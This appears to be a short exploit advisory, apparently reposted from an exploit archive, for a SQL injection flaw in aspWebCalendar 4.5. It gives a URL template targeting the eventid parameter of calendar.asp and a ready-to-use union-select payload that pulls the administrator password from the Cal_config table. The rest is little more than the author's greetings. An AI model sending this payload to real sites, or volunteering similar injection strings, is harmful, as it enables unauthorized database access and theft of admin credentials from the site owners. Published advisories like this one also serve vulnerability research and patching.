id: 1635
date: 03/22/2007
title: aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability
author: parad0x
cves: 

=====================================================================
aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability
=====================================================================



*******************************************************************************
# Title   :  aspWebCalendar Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# $$      :  free
*******************************************************************************
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]

Example:

/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config

"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron

"""""""""""""""""""""


#  0day.today [2023-03-25]  #